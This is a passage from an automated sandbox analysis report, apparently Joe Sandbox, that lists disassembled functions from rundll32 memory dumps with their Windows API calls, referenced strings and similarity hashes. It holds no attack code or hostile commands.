Download Yara Rule

APIs

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00A03A7B
memset.MSVCRT ref: 00A03A8F
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000040,?,00000000,00000000), ref: 00A03AA6
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 00A03AC1
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 00A03AE1
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00A03AF3

Strings

P&u, xrefs: 00A03AF3

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: File$Read$CloseCreateHandlePointermemset
String ID: P&u
API String ID: 3827546496-3268923125
Opcode ID: 1d9c191384824ea4532b8cfbee2d44181ab2bf81d165b6dc5c4564aeb57dd6d9
Instruction ID: 6e604c8a11359974e2e13bc24e799b21a802d1e456a388a7703c037c0b42cf8e
Opcode Fuzzy Hash: 1d9c191384824ea4532b8cfbee2d44181ab2bf81d165b6dc5c4564aeb57dd6d9
Instruction Fuzzy Hash: 3F118E727011286BDB209BA5AC49FEF7B7CEB46760F400154FA58E20D0EA708A47CAA1

Function 00A033F9 Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A03431
DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00A03443
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A0346A
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A0347C
AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A034CF
EncodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00A034E1
DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(00000000), ref: 00A034EF
ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00A0350F

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: Lock$PointerReleaseShared$AcquireDecodeExclusive$Encode
String ID:
API String ID: 3770696666-0
Opcode ID: 1c2dcb87031c59da349d91787da4f641bb350fa7eb3e7189a187104c0146826f
Instruction ID: e1646842f1ee0debad7eeb63949b9a974cb567ab8e63e2f4adc058c12630becd
Opcode Fuzzy Hash: 1c2dcb87031c59da349d91787da4f641bb350fa7eb3e7189a187104c0146826f
Instruction Fuzzy Hash: 1E411C75A0021DEFCB05DFA4DC8896EBBB9FF497117144099E906DB361DB31AE02CB50

Function 00A03D62 Relevance: 12.1, APIs: 8, Instructions: 98libraryloadermemoryCOMMON

Download Yara Rule

APIs

_wtoi.MSVCRT(?), ref: 00A03D94
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 00A03DA0
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00A03DD3
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,?,00000000,00000000), ref: 00A03DF1
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00A03E13
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00A03E30
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00A03E43
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,00000000,?,00000000,00000000), ref: 00A03E4C

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: AddressProc$Local$AllocByteCharFreeMultiWide_wtoi
String ID:
API String ID: 3528786098-0
Opcode ID: 0884d73f4c17d2fa938c1baddd71044e9087e24ad7f848e210c1b00b464b2461
Instruction ID: 42cda6345dc74175284c4e96ac176981d0cbb9817ddf3a062caa179da17b1308
Opcode Fuzzy Hash: 0884d73f4c17d2fa938c1baddd71044e9087e24ad7f848e210c1b00b464b2461
Instruction Fuzzy Hash: 2431BF7660021AEFDF218FA4EC489ABBBFDEF49710B144569ED45C3291D7708E02C6A0

Function 00A05F25 Relevance: 10.6, APIs: 7, Instructions: 138sleepCOMMON

Download Yara Rule

APIs

GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00A06C20,00000058), ref: 00A05F3A
Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8), ref: 00A05F6F
_amsg_exit.MSVCRT ref: 00A05F84
_initterm.MSVCRT ref: 00A05FD8
__IsNonwritableInCurrentImage.LIBCMT ref: 00A06004
exit.MSVCRT ref: 00A06087

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
String ID:
API String ID: 2849151604-0
Opcode ID: 24fe09ee89f8220d19f5cb39ff0e0ae6d0924e51a192c553559876aa9da9511f
Instruction ID: a473e39fd747f9661f292d8e66de564e8447d9ac6df42075211e93b507d3d67f
Opcode Fuzzy Hash: 24fe09ee89f8220d19f5cb39ff0e0ae6d0924e51a192c553559876aa9da9511f
Instruction Fuzzy Hash: FD41FF70A8071F9BEB24DFA4B94476A36B0FB08758F20812DE881972D1DB788C528A58

Function 04A36940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: dc57461b8510733814d8fc9320b0897b6c90d65de5d694b494a94ba67c4214ab
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 420213B1508341AFD315DF18C990A6FBBF5EFC8704F14892DB9998B264EB31E905CB92

Function 049AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 049AB6BF

Strings

0, xrefs: 049AB66F
-, xrefs: 049AB650
0, xrefs: 049AB695
+, xrefs: 049AB65A

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 9153ae1d085a33a5b335aedd362f35783ea0ed15e9ad2e2b5530006d08069c77
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 2A81D230E052499EDF24CE68C8507FEBBB6AF85320F184639DA61A7691C770B860CBD1

Function 04A120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04A1214F
___swprintf_l.LIBCMT ref: 04A12172

Strings

[, xrefs: 04A1212B
%%%u, xrefs: 04A12146
]:%u, xrefs: 04A12169

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 4d35cf06f677b7a9e3e14052d81e031620c804332517fbff63a2c66e3e7e44ef
Instruction ID: 215524a610f99986ea69818dc36d0faf1836727a98805ad28003feb0661c5191
Opcode Fuzzy Hash: 4d35cf06f677b7a9e3e14052d81e031620c804332517fbff63a2c66e3e7e44ef
Instruction Fuzzy Hash: 13213E77E01219ABDB10DFA9D840AEEBBF9EF94654F440166E945E3210E730FA118BA1

Function 00A06B60 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 00A04925
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00A04936
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00A0495D
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00A04964

Strings

`(u, xrefs: 00A04925

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: ErrorHeapLast$FreeProcess
String ID: `(u
API String ID: 1234203156-2040362809
Opcode ID: 0a43ec8721c7bd0e16e71da214930e67b7ecd2a0e90de8e9ff136d9d50e8a52f
Instruction ID: 5ee6298528b298d13458e48c784516f5f6242d19c076c9a920d2c71be63af29a
Opcode Fuzzy Hash: 0a43ec8721c7bd0e16e71da214930e67b7ecd2a0e90de8e9ff136d9d50e8a52f
Instruction Fuzzy Hash: F121F3B150011CDBCB14EFA0FE88A7FB768BF897457044064FA029A0A6DB309D07DBA0

Function 0498F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 049D031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049D02E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049D02BD

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 4e3e7818b0c4bd040172e3847b02221c7841b078f4374ac3ca146ebb2675f68a
Instruction ID: e98bcb2ac41879a725588637110a11ff6350224d357a0d458b3d191061053a8e
Opcode Fuzzy Hash: 4e3e7818b0c4bd040172e3847b02221c7841b078f4374ac3ca146ebb2675f68a
Instruction Fuzzy Hash: 45E1CD306047419FE725DF28C884B2AB7E5BB88328F144A7DF5A58B2E0E774F845CB52

Function 00A05695 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 245COMMON

Download Yara Rule

APIs

CharNextW.API-MS-WIN-CORE-STRING-L2-1-0(?,00000000,?,00000000,?), ref: 00A05885

Strings

/, xrefs: 00A056A5
sta, xrefs: 00A05724
localserver, xrefs: 00A0573A

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: CharNext
String ID: /$localserver$sta
API String ID: 3213498283-3694077230
Opcode ID: eb375fbc92613f5c8e3801cbad202a81c28a3742a6c97f264d7d3db43ac3548b
Instruction ID: 06a7272783ddec52640a1bc13cc7320cc33af81b9d0c2ffaad8158fcf577c433
Opcode Fuzzy Hash: eb375fbc92613f5c8e3801cbad202a81c28a3742a6c97f264d7d3db43ac3548b
Instruction Fuzzy Hash: DE718379E0061ADBCF24DF79A41067BB7F1EF54750F64486AE885EB2C0EA708E41EB50

Function 0499BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 049D7BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 049D7B7F
RTL: Resource at %p, xrefs: 049D7B8E

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 59c88af7220a9053c261760bf8447b44907ece0530d28b4dc7e3b45ec6fdf33a
Instruction ID: 577294b62bf4ec226000b2147367796d218d0a1ae8ab7b888d29e020feddcb5d
Opcode Fuzzy Hash: 59c88af7220a9053c261760bf8447b44907ece0530d28b4dc7e3b45ec6fdf33a
Instruction Fuzzy Hash: E141C2357407029FDB20EE29D840B6AB7E9FF88715F100A3DE95A9B680DB75F8058B91

Function 0499B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049D728C

Strings

RTL: Re-Waiting, xrefs: 049D72C1
RTL: Resource at %p, xrefs: 049D72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 049D7294

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: c5b4224d800cb91b5ee92533aaf2abe6a94970ef208afb641579005a21fecffb
Instruction ID: a03b1cd95004795b4cbc28824958b3d702424219d6eb9ef7b9953d419048bf2b
Opcode Fuzzy Hash: c5b4224d800cb91b5ee92533aaf2abe6a94970ef208afb641579005a21fecffb
Instruction Fuzzy Hash: 9341FF31700246ABDB20DE69CC41F6AB7E9FB94714F104A39FA55AB240DB30F852DBD1

Function 04A12300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04A1238D
___swprintf_l.LIBCMT ref: 04A123B3

Strings

%%%u, xrefs: 04A12384
]:%u, xrefs: 04A123AA

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: f2428eed9dfb4c46df865b4b6658b89115f274204b4d85a90b9fd3206d99ac04
Instruction ID: cca49ce833f43bac1f24e66f5b07dd1caf872076c39404d563f5ba664ccf9fe8
Opcode Fuzzy Hash: f2428eed9dfb4c46df865b4b6658b89115f274204b4d85a90b9fd3206d99ac04
Instruction Fuzzy Hash: 9A318673A002199FDB20DF29CD40BEEB7B8EB44750F4445A5E849E3210EB30FA558FA1

Function 00A02C6F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00A02CC6
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00A02CD2

Strings

`(u, xrefs: 00A02CD2
_p0, xrefs: 00A02CAD

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: ErrorLastOpenSemaphore
String ID: _p0$`(u
API String ID: 1909229842-760671758
Opcode ID: d0957f1583ccb986097969054f13f843c5e73cd0a5d0325289e74bc177786d40
Instruction ID: 6a774ddf49afdca55a205a9c31861163de402436cce8fd69baebc07a6722d3ce
Opcode Fuzzy Hash: d0957f1583ccb986097969054f13f843c5e73cd0a5d0325289e74bc177786d40
Instruction Fuzzy Hash: 4321C27120430E9FD315EF19E999AABB7E9EBD8310F10462DF85587391DB30DC068BA2

Function 00A024E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00A024EB
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00A024F7

Strings

kernelbase.dll, xrefs: 00A024E6
RaiseFailFastException, xrefs: 00A024F1

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RaiseFailFastException$kernelbase.dll
API String ID: 1646373207-919018592
Opcode ID: d552110bd18d7e9a8328c440203350fa1ec1e06df80c1d6987966c084c88dd07
Instruction ID: adf365f7b5dc7de65ca6913f0d3b824b966210766407d6a5ea738cfc740ef132
Opcode Fuzzy Hash: d552110bd18d7e9a8328c440203350fa1ec1e06df80c1d6987966c084c88dd07
Instruction Fuzzy Hash: 04E0EC7694022DB7CB226FE1EC0CDCB7F29FB487A17004421FD09921A1CA718812DBA0

Function 00A03E5B Relevance: 6.1, APIs: 4, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A03C66: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000008), ref: 00A03C87
Part of subcall function 00A03C66: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 00A03C93

Part of subcall function 00A03D62: _wtoi.MSVCRT(?), ref: 00A03D94
Part of subcall function 00A03D62: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 00A03DA0

WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 00A03EF5
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000), ref: 00A03F00
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 00A03F1E
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?), ref: 00A03F5C

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: ByteCharLibraryMultiWide$AddressAllocErrorFreeLastLoadLocalProc_wtoi
String ID:
API String ID: 1343397253-0
Opcode ID: f72173c3f8162940f1e8caefde7c28d416476212bf0ad472a98f0ac79ae94a6f
Instruction ID: fb6b3bd06c1e50163d204a6ba83252310e8a23bf7bcdcb2d0ea48797b46c1b30
Opcode Fuzzy Hash: f72173c3f8162940f1e8caefde7c28d416476212bf0ad472a98f0ac79ae94a6f
Instruction Fuzzy Hash: 5B312176A0020AEFDB14CFA9D8549AFB7B9EFC9704F148459E905D7390D7709E02CB60

Function 00A03306 Relevance: 6.1, APIs: 4, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A03381
ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A0339A

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID:
API String ID: 17069307-0
Opcode ID: 5e40ffe33c9a5660ca9af097bfa21844ae0349de382163aafa279913f4a17f55
Instruction ID: 9e49aae0f72655120657da2e49be208b962dee2428b0fb954db3b0ba2a97d2bf
Opcode Fuzzy Hash: 5e40ffe33c9a5660ca9af097bfa21844ae0349de382163aafa279913f4a17f55
Instruction Fuzzy Hash: 35318476610529EFCB05DB59D88896EB7B9FF4D310B054195E806DB3A1CB30AE03CB91

Function 00A03FE7 Relevance: 6.1, APIs: 4, Instructions: 55comCOMMON

Download Yara Rule

APIs

CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000006), ref: 00A04003
CLSIDFromString.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 00A04012
CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,00000000,00000001,00A01970,?,?,?), ref: 00A0402D
CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 00A0405E

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: CreateFromInitializeInstanceStringUninitialize
String ID:
API String ID: 2575628211-0
Opcode ID: b517a40b1850ee127997939dead4602968f766b52055fa16ecd76fcec0215d2c
Instruction ID: 29f2cb44745835a9693a74a9aa1824447394898cf8e1e16ec94020d158c2f99a
Opcode Fuzzy Hash: b517a40b1850ee127997939dead4602968f766b52055fa16ecd76fcec0215d2c
Instruction Fuzzy Hash: 4C110C31B0021CAFDB14DFA5DC49EAF7BB9EB8C710F000059E606E7291DB65A903CBA5

Function 00A05E80 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 00A06598: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00A0659F

__set_app_type.MSVCRT ref: 00A05E92
__p__fmode.MSVCRT ref: 00A05EA8
__p__commode.MSVCRT ref: 00A05EB6
__setusermatherr.MSVCRT ref: 00A05ED7

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 357b35af7407d049874d7102678902ff9e1c959957b9cb8c93b0a539a773091b
Instruction ID: 19bd7f8681887d8a3bd0e3a648faffb0a9f8acacf16b3d3cee2ecb74b31252df
Opcode Fuzzy Hash: 357b35af7407d049874d7102678902ff9e1c959957b9cb8c93b0a539a773091b
Instruction Fuzzy Hash: 4AF0F8B054030D9FCB28EFB0BD4E6093B60BB19735F104A19E4A1862F6DF799067CE14

Function 049A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 049A7E8B

Strings

-, xrefs: 049A7DDD
+, xrefs: 049A7DE8

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
